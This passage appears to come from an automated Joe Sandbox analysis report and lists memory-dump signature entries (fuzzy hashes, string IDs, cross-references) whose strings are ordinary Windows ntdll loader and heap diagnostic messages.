                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                           • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                          • API String ID: 0-122214566
                                                          • Opcode ID: e6e1788be513af10adc7c6833791c92d772cc8b77e60b7e27c79e506c7a535b2
                                                          • Instruction ID: d96de9a8d32c20a852ffa1abb94c87f52a5dc82b41c5d9053facbf9a861c4eda
                                                          • Opcode Fuzzy Hash: e6e1788be513af10adc7c6833791c92d772cc8b77e60b7e27c79e506c7a535b2
                                                          • Instruction Fuzzy Hash: FBC12575B06315EBEB14CB64C882BBEB7BAFF45300F5441A9E805AB281DF749D44C3A1
                                                          Strings
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 359902BD
                                                          • RTL: Re-Waiting, xrefs: 3599031E
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 359902E7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                           • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                          • API String ID: 0-2474120054
                                                          • Opcode ID: b8fc64a8037e120834c3f6d1b461d1871abe33cf9b02fac8cc5f7bf60617cd9f
                                                          • Instruction ID: 22e676d69c9867ccd7afae0852240a485372c3c5b1cb506ad97bd4a1598bf4c2
                                                          • Opcode Fuzzy Hash: b8fc64a8037e120834c3f6d1b461d1871abe33cf9b02fac8cc5f7bf60617cd9f
                                                          • Instruction Fuzzy Hash: 82E1CEB46087429FE724CF28C880B6AB7E5FF88324F150A59E5A5CB3D1DB74E945CB42
                                                          Strings
                                                          • WindowsExcludedProcs, xrefs: 3594522A
                                                          • Kernel-MUI-Language-Allowed, xrefs: 3594527B
                                                          • Kernel-MUI-Language-Disallowed, xrefs: 35945352
                                                          • Kernel-MUI-Language-SKU, xrefs: 3594542B
                                                          • Kernel-MUI-Number-Allowed, xrefs: 35945247
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                           • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                          • API String ID: 0-258546922
                                                          • Opcode ID: 93b6e4c89e3e50b5627a778970f46a09a45ed9acb50d5123787c029bf54b18f4
                                                          • Instruction ID: ada961895fc4f0c943edcdacb540c461cfd7a9fde692cb699b4da26956d75629
                                                          • Opcode Fuzzy Hash: 93b6e4c89e3e50b5627a778970f46a09a45ed9acb50d5123787c029bf54b18f4
                                                          • Instruction Fuzzy Hash: 90F14CB6E15218EBDB11CF98C980E9EBBFDFF08650F55406AE401A7211EB74AE05CB90
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                           • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 1a69ffc12e6522ee1932a1e6d53df53575ed74677711de35c45afb9fcdd696f9
                                                          • Instruction ID: e75643fdc9aa5483563d08f7d7407732681160fe2bcdcd47d147025718988992
                                                          • Opcode Fuzzy Hash: 1a69ffc12e6522ee1932a1e6d53df53575ed74677711de35c45afb9fcdd696f9
                                                          • Instruction Fuzzy Hash: 01F10376F002158FDB08CF68C9A06BEBBF6FF98211B19416DD456EB381E675EA01CB50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                           • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                          • API String ID: 0-3061284088
                                                          • Opcode ID: 29f59bdcf1fff031737098b70d40b9026ba3bdbbd053d0106076c7632ab7e52f
                                                          • Instruction ID: 6cabaeeee80461137cb325c5f1129c82ea14544c4943469ea3901f93ad310641
                                                          • Opcode Fuzzy Hash: 29f59bdcf1fff031737098b70d40b9026ba3bdbbd053d0106076c7632ab7e52f
                                                          • Instruction Fuzzy Hash: 0601703B115354DEE315831CF408F967BEAEF4A770F29404AE40147752DFA5AD81C960
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                           • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                          • API String ID: 0-3178619729
                                                          • Opcode ID: b0673197e3cddc46baf774915d41bd7043dda4cc457391c7b7e97e05c1218b2a
                                                          • Instruction ID: 7aeaac4aaad044de148d09a7f4ed417387fa0c94ac76778610475d8a2358c5d0
                                                          • Opcode Fuzzy Hash: b0673197e3cddc46baf774915d41bd7043dda4cc457391c7b7e97e05c1218b2a
                                                          • Instruction Fuzzy Hash: C413C174A06315CFEB15CF68C891BA9BBF6FF48304F1481A9D849AB381D774A946CF90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                           • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                          • API String ID: 0-2586055223
                                                          • Opcode ID: 5c3b3f2e045d1d3f46a96f9bb7d9cd4780d827b39ab7db5a73af2a773e9e9367
                                                          • Instruction ID: faf1e36c00c2076ef0eb0f31e20488d5d75868e2ce6e319961b1b65b055b77c8
                                                          • Opcode Fuzzy Hash: 5c3b3f2e045d1d3f46a96f9bb7d9cd4780d827b39ab7db5a73af2a773e9e9367
                                                          • Instruction Fuzzy Hash: 2F613076308788AFE312CB28D844F17B7E9FF84754F080469E9518B292CB34E901CB61
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                           • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                          • API String ID: 0-336120773
                                                          • Opcode ID: 62d7f8546a6e6550a6cc07819849ff4e6215095c690cf7f4d0d651af582e4c95
                                                          • Instruction ID: 7d9175382564fa993d8dd138a219991fe26b6a0a2a3e5eb76ad603f7056d0f40
                                                          • Opcode Fuzzy Hash: 62d7f8546a6e6550a6cc07819849ff4e6215095c690cf7f4d0d651af582e4c95
                                                          • Instruction Fuzzy Hash: E2312637204294EFD710CB98D880F5AB3FAFF08668F118155FA02DB291DB32ED41DA64
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                           • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                          • API String ID: 0-1391187441
                                                          • Opcode ID: 543a25370583589446bbb4b8e30637b3e2010539dc9456485b8204cd4fe6aeef
                                                          • Instruction ID: f317d8128c5f78a175ad759ac6a9e7b50d70a269328fded6726639eb5b45aab8
                                                          • Opcode Fuzzy Hash: 543a25370583589446bbb4b8e30637b3e2010539dc9456485b8204cd4fe6aeef
                                                          • Instruction Fuzzy Hash: E731A136600618EFD701DB55C888F9AB7FEFF49764F114192E815AB291E770EE80CE60
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                           • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID:
                                                          • API String ID: 3446177414-0
                                                          • Opcode ID: 3d6166987d265dfefe5eddf2f7bea5ab7daaa122d64cd5758362618d42b31e6a
                                                          • Instruction ID: f3e29de5a6bbc8cf3d16ca73a2bffe766994be55fed7d4912ed7976177acb612
                                                          • Opcode Fuzzy Hash: 3d6166987d265dfefe5eddf2f7bea5ab7daaa122d64cd5758362618d42b31e6a
                                                          • Instruction Fuzzy Hash: C2511035A04B0AEFEB05CF65CE44BADBBB9FF04355F144069E412A3291EBB4A911DB81
                                                          Strings
                                                          • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 35921728
                                                          • HEAP[%wZ]: , xrefs: 35921712
                                                          • HEAP: , xrefs: 35921596
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                           • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                          • API String ID: 0-3178619729
                                                          • Opcode ID: 495a006e2038b66d0aae629d1512da7f02485572facd3e814887158a676da4f4
                                                          • Instruction ID: cd6f7654056a466eac4a9a3bfa91ab51ce5c791415088beea5c404403b5a9f27
                                                          • Opcode Fuzzy Hash: 495a006e2038b66d0aae629d1512da7f02485572facd3e814887158a676da4f4
                                                          • Instruction Fuzzy Hash: 72E1F274A043899FE715CF28C450B7ABBFAFF48304F18849EE4969B24ADB34E951DB50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                           • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                          • API String ID: 0-1145731471
                                                          • Opcode ID: b87dbdc9af4ef54f2593fe2035fc5834c63d8481fdae929c8eb6226237ef041f
                                                          • Instruction ID: c8b115294f9b8315c2e4533caa4bb291d3390e12be3280b7f50bbb2061a0c59a
                                                          • Opcode Fuzzy Hash: b87dbdc9af4ef54f2593fe2035fc5834c63d8481fdae929c8eb6226237ef041f
                                                          • Instruction Fuzzy Hash: BFB1CC79A187098FDB25CF68C980F9DB3FABF48354F144929E855EB684D738E840CB51
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                           • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                          • API String ID: 0-2391371766
                                                          • Opcode ID: d590bc075687f0b2b9f192945b8dcc30f59efb8edc7b77aedec5674518741f74
                                                          • Instruction ID: 9922695dad9bea063556cecaa9bc4c3b0f2d3be8133900533c228114207307f6
                                                          • Opcode Fuzzy Hash: d590bc075687f0b2b9f192945b8dcc30f59efb8edc7b77aedec5674518741f74
                                                          • Instruction Fuzzy Hash: 5AB19BB6608345AFE712CE54C880F5BB7E8FB49754F410829FA41AB650DB74E909CBA2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                           • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                          • API String ID: 0-318774311
                                                          • Opcode ID: a85db80ea518c9037343e50496b9d4bb04841ccdfc5ee3c5ddffdfe7924f7590
                                                          • Instruction ID: 2cbb1f31c5d45379c97a8009dc150f6e7d3c3f8925923d590b7b280fe7ce98e0
                                                          • Opcode Fuzzy Hash: a85db80ea518c9037343e50496b9d4bb04841ccdfc5ee3c5ddffdfe7924f7590
                                                          • Instruction Fuzzy Hash: 79816DB5608341AFEB11CB15C881B6AB7E8FF89750F44092DF9919B391DBF8E904CB52
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                          • API String ID: 0-3870751728
                                                          • Opcode ID: c69f18ca6a47fdd0418ecd62ab1a01b38385b4138eb2fb957454323c10432b36
                                                          • Instruction ID: 92a7a02eba07edcb775daeef892842ea3c049b76e3f1131661c5711b5b98e1a3
                                                          • Opcode Fuzzy Hash: c69f18ca6a47fdd0418ecd62ab1a01b38385b4138eb2fb957454323c10432b36
                                                          • Instruction Fuzzy Hash: D0914CB5E002059FEB14CF68C881B9DBBF1FF88314F14816AD905AB391EB759842CFA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                          • API String ID: 0-373624363
                                                          • Opcode ID: 43d0e6b73bd2907e7da0a5ed427a3a4e39834f7e6f8e99b078f93aedf3141705
                                                          • Instruction ID: dfbb67601421f03b74d3015a71d656eb889410e9f45908ada545defc1477eb64
                                                          • Opcode Fuzzy Hash: 43d0e6b73bd2907e7da0a5ed427a3a4e39834f7e6f8e99b078f93aedf3141705
                                                          • Instruction Fuzzy Hash: 8391D0B5A09709CFEB21CF54D840BAE77F6FF04364F148199E855AB294D7B8DA80CB90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %$&$@
                                                          • API String ID: 0-1537733988
                                                          • Opcode ID: 0cf6b1ff0aba6b1046aeab2b41e6fbdf35cd66b9f2b9bcc8b274f220f87c3624
                                                          • Instruction ID: c5924b10c9b6bf900a6a54a620e9ebb70033cee497d4973de1d4dc4f0350b2d2
                                                          • Opcode Fuzzy Hash: 0cf6b1ff0aba6b1046aeab2b41e6fbdf35cd66b9f2b9bcc8b274f220f87c3624
                                                          • Instruction Fuzzy Hash: F671BE746093019FE714CF20C980A5BBBFEFF89668F508D1DE49A87291DB31E915CB92
                                                          Strings
                                                          • GlobalizationUserSettings, xrefs: 359FB834
                                                          • TargetNtPath, xrefs: 359FB82F
                                                          • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 359FB82A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                          • API String ID: 0-505981995
                                                          • Opcode ID: 9d1225d339c197a8876d588391f5e38300b6d1f0d0f6311da16bf6b8467e3ae5
                                                          • Instruction ID: 346ff60b9d34a86e280657abac873aead1bd9e4235003a3d82435758946c7c77
                                                          • Opcode Fuzzy Hash: 9d1225d339c197a8876d588391f5e38300b6d1f0d0f6311da16bf6b8467e3ae5
                                                          • Instruction Fuzzy Hash: 41618D72A4122DABDB21DF54DC88BDAB7B9BF08755F4101E5E908A7250CB35EE84CF90
                                                          Strings
                                                          • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3597E6C6
                                                          • HEAP[%wZ]: , xrefs: 3597E6A6
                                                          • HEAP: , xrefs: 3597E6B3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                          • API String ID: 0-1340214556
                                                          • Opcode ID: c165fc5e846968a4d5aa57e3d974e0180d1ecd02c228e8d19ba03bcd66fd77e6
                                                          • Instruction ID: 71bf72e3dbb1d6c28283190648256c209bd258f9fe79880a6d58471b30a4997c
                                                          • Opcode Fuzzy Hash: c165fc5e846968a4d5aa57e3d974e0180d1ecd02c228e8d19ba03bcd66fd77e6
                                                          • Instruction Fuzzy Hash: 0551F675604B58EFE312CB64C845F9ABBF9FF05344F0440A5E9428B693DB78EA40CB20
                                                          Strings
                                                          • LdrpCompleteMapModule, xrefs: 3598A590
                                                          • Could not validate the crypto signature for DLL %wZ, xrefs: 3598A589
                                                          • minkernel\ntdll\ldrmap.c, xrefs: 3598A59A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                          • API String ID: 0-1676968949
                                                          • Opcode ID: 0509b44e89950cbf40d8d7c48efbd70374688c7641e6d8c2b5a4e7fd32f8e8fb
                                                          • Instruction ID: 1f6d2c5b2f8bdad2fb5b910641b39fced739bd373a52de4e8881ead6c034e8df
                                                          • Opcode Fuzzy Hash: 0509b44e89950cbf40d8d7c48efbd70374688c7641e6d8c2b5a4e7fd32f8e8fb
                                                          • Instruction Fuzzy Hash: 035152B8704784DBE722CB1AC984B0A77F9FF00764F0802A9E9519B6E2DB74ED40CB40
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                          • API String ID: 0-1151232445
                                                          • Opcode ID: 463b1ee5b278975235badf5b921968a65e835511f334f7e4fe0f6cd7a105862b
                                                          • Instruction ID: 6122f0c215827d47586a98aa936522354154297df83801d88ba9986fae7f7fa5
                                                          • Opcode Fuzzy Hash: 463b1ee5b278975235badf5b921968a65e835511f334f7e4fe0f6cd7a105862b
                                                          • Instruction Fuzzy Hash: 144179B93043558FEB25CB1CC880B6977E5BF053D4F5440AADC568B242DB72DA86CB12
                                                          Strings
                                                          • minkernel\ntdll\ldrtls.c, xrefs: 35991B4A
                                                          • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 35991B39
                                                          • LdrpAllocateTls, xrefs: 35991B40
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A8E000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_358f0000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                          • API String ID: 0-4274184382
                                                          • Opcode ID: 94820b7001e6cd39bdd301457552587ef511eba92085b97c90546ae679d392bd
                                                          • Instruction ID: acc8df62986a2e30a4aabd6cfda6ab81215815c120dd819cca079e6d001712b0
                                                          • Opcode Fuzzy Hash: 94820b7001e6cd39bdd301457552587ef511eba92085b97c90546ae679d392bd
                                                          • Instruction Fuzzy Hash: AE41AAB5A01749EFDB15CFA8C840BAEBBF6FF48314F148519E405A7211DB74A901EF90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2914801350.00000000358F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 358F0000, based on PE: true
                                                          • Associated: 00000004.00000002.2914801350.0000000035A19000.00000040.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.2914801350.0000000035A1D000.00000040.00001000.00020000.00000000.sdmp
